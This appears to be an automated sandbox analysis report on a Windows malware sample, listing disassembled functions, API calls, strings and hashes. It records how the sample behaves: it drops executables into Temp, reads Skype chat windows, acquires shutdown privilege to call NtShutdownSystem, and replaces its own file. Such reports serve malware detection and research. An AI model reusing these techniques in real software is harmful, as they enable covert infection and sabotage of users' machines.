                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1659193697-0
                                                                                                                                                                                                                                                      • Opcode ID: b638f4627732eb91bcd97fda672726ab788b862846abe240ad7aa020d5e8f80b
                                                                                                                                                                                                                                                      • Instruction ID: 29111852331fc9f6b874d3848e252dbb7bd2cb62a335b53481466694710a7231
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b638f4627732eb91bcd97fda672726ab788b862846abe240ad7aa020d5e8f80b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C312B72504A11BBE710BB20AC06AAB7799EB05324F50083FF544B71C1EB7DAD55CAAD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168B8
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: GetAdaptersInfo.IPHLPAPI(00000000,76AF23A0), ref: 004168DA
                                                                                                                                                                                                                                                        • Part of subcall function 00416896: inet_addr.WS2_32(000001D8), ref: 004168ED
                                                                                                                                                                                                                                                      • gethostname.WS2_32(?,00000080), ref: 0041704F
                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00417065
                                                                                                                                                                                                                                                        • Part of subcall function 00416BF1: lstrlenA.KERNEL32(00459868,004170BD,00000001,?,?,?,76AF23A0), ref: 00416BFF
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004170BE
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • inet_ntoa.WS2_32(?), ref: 004170EC
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?,00417108,0042A774,?,TCP,?,00000000,?,?,?,?,?,?,76AF23A0), ref: 00416EDF
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F08
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F2F
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F58
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416F7F
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416FA6
                                                                                                                                                                                                                                                        • Part of subcall function 00416E93: lstrcatA.KERNEL32(?,?), ref: 00416FCF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$lstrlen$AdaptersInfo$CountTickgethostbynamegethostnameinet_addrinet_ntoa
                                                                                                                                                                                                                                                      • String ID: TCP
                                                                                                                                                                                                                                                      • API String ID: 2422590998-617288268
                                                                                                                                                                                                                                                      • Opcode ID: e1602f64369b46a3807cfafc907e5879a1d62b839d2e3dace35d8ca8e897e3f8
                                                                                                                                                                                                                                                      • Instruction ID: b1e24fbc6d044a6cad89cbc1356073e7b4529d59893941b7878710fa553d88fd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1602f64369b46a3807cfafc907e5879a1d62b839d2e3dace35d8ca8e897e3f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4931E872944218AFDF21AFB4DC42DEA37B8AF08344F14043AFA11D2212DA39D9858765
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00407148
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000001), ref: 00407179
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407190
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00459550,?,?,00000000), ref: 004071AF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • a -y -tk -inul "%s" "%s", xrefs: 0040718A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExecuteShelllstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                      • String ID: a -y -tk -inul "%s" "%s"
                                                                                                                                                                                                                                                      • API String ID: 3829639410-2905394512
                                                                                                                                                                                                                                                      • Opcode ID: 7c97293413f84c9f8f14aaef77ea9b6cd92d0e57f7caeeab3560becff9bb9e2a
                                                                                                                                                                                                                                                      • Instruction ID: 326c217c6b6f7d4bd8146a61f9f086012908346599ec174fa88cd2dd75d7bcef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c97293413f84c9f8f14aaef77ea9b6cd92d0e57f7caeeab3560becff9bb9e2a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7112972D08218BFDB328B78CC44ED77BAC9B04750F1404B5A588F62C2D5746EC58B65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFileVersionInfoSizeA.VERSION(?,?), ref: 0041BE01
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • GetFileVersionInfoA.VERSION(?,00000000,00000000,00000000,?,?,?,?), ref: 0041BE1E
                                                                                                                                                                                                                                                      • VerQueryValueA.VERSION(00000000,0042A3B0,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 0041BE31
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                        • Part of subcall function 00410C3B: RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$FileInfoProcessVersion$AllocateFreeQuerySizeValue
                                                                                                                                                                                                                                                      • String ID: Higher: %x$Lower: %x
                                                                                                                                                                                                                                                      • API String ID: 2536384491-2842063683
                                                                                                                                                                                                                                                      • Opcode ID: 5f0f069ad013188f1c4b64b7c2a0420a2a14f62a35749df945d88ecac4275582
                                                                                                                                                                                                                                                      • Instruction ID: 56eebd3162b18028b7251b0968c42e15224d0ed09f1a35764b155e5641b832ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f0f069ad013188f1c4b64b7c2a0420a2a14f62a35749df945d88ecac4275582
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D118271601228BFD700EF65DC41DAB7BACEF45314B55005AFC05DB241DA38ED11C7A4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrlenA.KERNEL32(?), ref: 00406DB5
                                                                                                                                                                                                                                                        • Part of subcall function 00406F76: lstrlenA.KERNEL32(?), ref: 00406F8B
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 00406E1F
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrcatA.KERNEL32(00000000,?), ref: 00406E2D
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: GetTickCount.KERNEL32 ref: 00406E33
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrlenA.KERNEL32(00000000), ref: 00406E56
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: wsprintfA.USER32 ref: 00406E7B
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: ShellExecuteA.SHELL32(00000000,00000000,00459550,?,00000000,00000000), ref: 00406E96
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: Sleep.KERNEL32(00000BB8), ref: 00406EA1
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406ED3
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrlenA.KERNEL32(?,?), ref: 00406EF5
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: lstrlenA.KERNEL32(?,00000000), ref: 00406EFF
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: ReadFile.KERNEL32(?,?,00000100,?,00000000), ref: 00406F25
                                                                                                                                                                                                                                                        • Part of subcall function 00406D9C: CloseHandle.KERNEL32(?), ref: 00406F35
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\), ref: 0040720D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,0000000A), ref: 0040721C
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040723D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • .exe, xrefs: 00407231
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\, xrefs: 00407201
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$Filelstrcatlstrcpy$CloseCountCreateExecuteHandleReadShellSleepTickwsprintf
                                                                                                                                                                                                                                                      • String ID: .exe$C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\
                                                                                                                                                                                                                                                      • API String ID: 20153216-2928587
                                                                                                                                                                                                                                                      • Opcode ID: 22b85fd1091add9b8ad02c3bfe50216b0fbd10936eb2904f226c3a7c80e6c9c8
                                                                                                                                                                                                                                                      • Instruction ID: b8655bf1368447873f574bdc505146dc3dea2c0eda96ab80bdee70fd1e2fcb46
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22b85fd1091add9b8ad02c3bfe50216b0fbd10936eb2904f226c3a7c80e6c9c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01DB33A0C2156BDB20AA64AC05FCA33AC9F10314F100477F585E20C1EEB8B7C64BAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000080), ref: 00420FCB
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00000080), ref: 00421004
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0042100F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$ClassNameTextWindow
                                                                                                                                                                                                                                                      • String ID: TConversationForm.$TskMultiChatForm.
                                                                                                                                                                                                                                                      • API String ID: 3135624604-3921460193
                                                                                                                                                                                                                                                      • Opcode ID: aa9c27489bc195674f4436dd1275cc9ed224b78000dd7edc875c5fc1c9763827
                                                                                                                                                                                                                                                      • Instruction ID: 92048e3ca0c4b5642d9c4030300f4ed62e4a246fa2bbab872e422d4a88989829
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa9c27489bc195674f4436dd1275cc9ed224b78000dd7edc875c5fc1c9763827
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB01F5726041189FEF20EBB0FD05AEF77ECEF14308F600067FC55E2261E6299A948B65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,00000020), ref: 0041471C
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_0001469F,?), ref: 00414769
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$ChildClassEnumNameWindows
                                                                                                                                                                                                                                                      • String ID: NotifyIconOverflowW$Shell_TrayWnd$ToolbarWindow32
                                                                                                                                                                                                                                                      • API String ID: 2229386341-4003164428
                                                                                                                                                                                                                                                      • Opcode ID: 34a13e1590ee50ec51f0225bc2a901d09827b872e0a7360d78465de432d85488
                                                                                                                                                                                                                                                      • Instruction ID: f967666947b2ef1a19ccd906feb9eedd695bd996a2d89b631b970162c6846aa2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34a13e1590ee50ec51f0225bc2a901d09827b872e0a7360d78465de432d85488
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F062B2644318AEEF04BBA1ED1A99E77ACAB00359B60842BF811D51C0EB69E591461D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,0040DBE4), ref: 00413DFF
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtShutdownSystem), ref: 00413E0F
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                        • Part of subcall function 00413D4D: OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken$AddressHandleModuleProc
                                                                                                                                                                                                                                                      • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                                                                                                                                                                                                      • API String ID: 3075762919-1699316426
                                                                                                                                                                                                                                                      • Opcode ID: 4418ae8d23ed69dc849c6a8915aac782c2428f256db25c7784c1a8dc7b81b09c
                                                                                                                                                                                                                                                      • Instruction ID: 7eee17d45d3a3d3c8df278aae3deab6605867ede4639a44efbcfd7aeccc4ad11
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4418ae8d23ed69dc849c6a8915aac782c2428f256db25c7784c1a8dc7b81b09c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62D01272B943705BE6206E767C0ABD716449B00F21B964467BC45E51C1D9988CD184AE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(0040D773,0040D773,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,0040D773,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,?), ref: 00413CCF
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0040D773,00000080), ref: 00413CE3
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(0040D773), ref: 00413CEA
                                                                                                                                                                                                                                                      • MoveFileA.KERNEL32(?,0040D773), ref: 00413CF5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe, xrefs: 00413CC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
